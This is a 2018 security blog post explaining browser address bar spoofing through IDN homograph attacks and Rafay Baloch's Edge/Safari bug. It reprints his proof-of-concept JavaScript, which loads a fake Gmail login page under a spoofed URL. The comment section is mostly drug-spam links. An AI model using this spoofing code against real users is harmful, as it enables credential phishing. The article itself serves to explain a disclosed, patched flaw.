Dec 2, 2018
172 Views
0 0

Web Browser Address Bar Spoofing

Written by

According to Google, the address bar is the most important security indicator.

The Google security team stated that the address bar is the most important security indicator in modern browsers. This part of the browser supplies both the true identity of the website and verification that you are on the right website.

Eric Lawrence, the author of Fiddler, an HTTP debugging proxy, has written about this feature on his personal blog. In his article, he gave reasons why web developers couldn’t interfere with anything above the webpage window, sometimes referred to as The Line of Death and what problems might occur from this lack of involvement. Despite his efforts to raise awareness, two address bar spoofing incidents took place the same year the blog post was published.

 

Homograph Vulnerability

One of the address bar spoofing incidents was the Homograph vulnerability that took place in April 2017. Using the International Domain Name (IDN) feature, which allows domain names to be written in foreign characters, attackers imitate legitimate domains using characters from various alphabets to trick users. This attack is called a Homograph attack.

For example, the xn--80ak6aa92e.com address would show as “аррӏе.com” due to the IDN, which is virtually indistinguishable from “аpple.com,” even though these are totally different letters that just happen to look the same. Don’t believe us?

  • Copy this а here
  • Paste it into your browser bar, and press Return
  • Did you receive search results for the letter ‘a’ of the Latin alphabet or the Cyrillic script?

However, browser developers took precautions by releasing security patches that prevented this confusing behavior shortly after the discovery of the vulnerability. One tactic was to convert an IDN address into the ASCII format in the address bar, which managed to prevent malicious activity.

READ ALSO  Understating asymmetric and symmetric key cryptography, hash functions, MITM attacks, Salts, Bruteforce attacks and more

Address Bar Spoofing in Microsoft Edge and Safari

The second address bar spoofing incident was discovered by Pakistani researcher Rafay Baloch, who lectures at various conferences, such as Blackhat, on his research about browser security. The address spoofing technique he found affected Microsoft Edge and Safari browsers.

  • While a website redirected its visitor to another website with a closed port, the attacker could intervene and change the content of the current web page however they liked.
  • Since the URL bar already showed the address of the domain with the closed port, users were led to believe that they were browsing a legitimate site instead of an attacker-controlled one and are convinced to enter their credentials.
  • In his proof-of-concept, before redirecting the user to the website with the closed port, Baloch decoded the base64 encoded version of Gmail login page and then added it to the DOM. Therefore the address in the URL (http://gmail.com:8080) and the phishing page looked very convincing. Baloch managed to keep the spoofed address stable by using the setinterval() function that tried to redirect the user every 100 seconds.

The Code Used to Spoof the Web Browser Address Bar

Baloch used the following code for the aforementioned exploit.-

function spoof()
{
var gmail = 'PCFET0NC8+KArOK.........ZHk+PC9odG1sPg=='; // The base64 encoded version of the Gmail page
x=document.body.innerHTML=atob(gmail);
document.write("<title>Gmail</title>");
document.write("x");
window.location.assign("https://www.Gmail.com:8080");
}
setInterval(spoof(),100000);
</script>

The proof-of-concept above was the one working on the Microsoft Edge browsers. The latest security update for Microsoft Edge fixed the vulnerability. Baloch’s tweet announced that Apple also fixed the vulnerability with the release of Safari 12. You can read more about his research on the blog post, Apple Safari, and Microsoft Edge Browser Address Bar Spoofing – Writeup.

READ ALSO  Getting Started with Terms & Technologies

Conclusion

The address bar is the main component used by web browsers to navigate the Internet. Users enter the website they wish to visit. Web security-conscious users may watch the changes on the address they enter as the page loads. Attackers are aware of this and, therefore, invent smart ways to deceive the user, such as the Homograph attacks and the vulnerabilities found by Rafay Baloch. Keeping all software, especially web browsers, up to date is crucial to help prevent similar attacks.

Article Tags:
· · · · ·
Article Categories:
Hack Like Pro
http://techandsecurity.net

CEO & FOUNDER OF" FIVE RIVERS INCORPORATION - LEADING SOFTWARE & CYBER SECURITY DEVELOPMENT COMPANY" || CERTIFIED ETHICAL HACKER || FUTURE TRILLIONAIRE || FUTURISTIC || "DULL SCHOOL STUDENT" || (Follow this link to message me on WhatsApp: https://wa.me/13018426470)

Comments to Web Browser Address Bar Spoofing

  • Propecia Presentacion Bayer Levitra Originale Achat De Cialis Viagra [url=http://levipill.com]can you get levitra cheap[/url] Amoxil Clavula Side Effects Acquistare Priligy Senza Ricetta Cialis Tanio Purchasing Amoxicilina 500mg Internet Buy Prednisone Dog [url=http://curerxfor.com]viagra online[/url] Viagra Ohne Rezept Deutschland Kaufen Brand Cialis Non Prescription Needed

    JeaInorse December 21, 2018 10:45 pm Reply
  • Viagra Para Distrofia Muscular Levaquin With Free Shipping Levitra Original Precio [url=http://leviplus.com]cheap levitra for sale[/url] Viagra 30 Anni I Want To Buy 500 Mg Metronidazole Acheter Levitra Medicament [url=http://tadalaf20mg.com]cialis 5 mg[/url] How To Minimize Side Effects Amoxicillin For Sale Hydrochlorothiazide Buy Kamagra In London Peut Acheter Viagra Sans Ordonnance [url=http://cialonlinecs.com]cialis[/url] Propecia Sildenafil Wo Bekomme Ich Viagra Her Cialis Ricetta Rossa Benefici Propecia [url=http://bpdrugs.com]cheapest cialis 20mg[/url] Cialis Medicamento Efectos Secundarios Zithromax Used To Treat Ersatz Viagra Ebay Kamagra [url=http://aaost.com]cialis price[/url] Propecia Capsulas 1 Mg Propecia Flomax Lasixonline Cialis 5 Mg Prezzo Generico [url=http://propecorder.com]generic propecia for sale[/url] Stendra Buy Now Cialis Site Fiable Propecia Musculo

    JeaInorse January 5, 2019 10:13 pm Reply
  • It’s really a nice and helpful piece of information. I am glad that you simply
    shared this helpful information with us. Please keep us informed like this.
    Thank you for sharing. https://xtrapuregarcinia.org/

    xtrapuregarcinia.org January 17, 2019 3:49 pm Reply
  • Acquisto Kamagra 25 Mg Avis Propecia Generique Cialis Es Efectivo [url=http://priliorder.com]cialis priligy[/url] Levitra Generika Rezeptfrei Bestellen Propecia Side Effects Recession Discovering Amoxicillin But Amoxicillin [url=http://drugs20.com]cialis 40 mg[/url] Yasmin Aus Viagra 50mg Price Viagra Uso Mujeres Elavil Generic 50 Mg. No Script Zithromax J Code [url=http://cialcheap.com]cialis 5 mg[/url] Buy Kamagra Viagra Buy Cheap Xenical Uk Cephalexin Free Shipping Macrobid Antibiotic Cod Accepted Visa Pharmacy [url=http://uscagsa.com]cialis for sale[/url] Buy Prednisone 10mg

    JeaInorse January 17, 2019 10:46 pm Reply
  • Purchase Elocon C.O.D. With Free Shipping Low Price Propecia Acatisia Cheap 100mg Viagra [url=http://tadalaffbuy.com]cheapest cialis[/url] Farmacie Online Viagra 25mg Generika Propecia Colesterol [url=http://drugs2k.net]cialis[/url] Cialis Duree Action Viagra Prezzo Migliore Cialis Originale Miglior Prezzo Osu Levitra Comprar [url=http://cialionline.com]buy cialis[/url] Vente Cialis Canada

    KelPlaili January 20, 2019 9:48 am Reply
  • Cialis 10 Mg Filmtabl Preisvergleich Cialis 20mg Testberichte [url=http://costofvia.com]viagra[/url] Cialis Diario 5 Mg Viagra Frei Kaufen Controindicazioni Uso Cialis Propecia Kaufen Osterreich Propecia Provoca Esterilidad [url=http://rxbill7.com]cialis generic[/url] Cheap Kamagra Tablets Amoxicillin Dosage For Urinary Tract Infection

    JeaInorse January 23, 2019 9:33 am Reply
  • Can I Buy 60 Pills Cytotec In Canada Vente Cialis Generique Pas Cher Viagra Online Usa [url=http://euhomme.com]cialis prices[/url] Levitra Sans Ordonance Canadian Health Care Pharmacy Kamagra Sildenafil Preis

    JeaInorse February 3, 2019 7:24 pm Reply
  • Pingback: www.healthylifethailand.com

  • Pingback: try this out

  • I am curious to find out what blog system you’re using?
    I’m having some small security issues with my latest website and
    I’d like to find something more safe. Do you have any solutions?

    cat hat February 27, 2019 8:09 pm Reply
  • Pingback: UK Chat Rooms

Leave a Reply

Your email address will not be published. Required fields are marked *

Share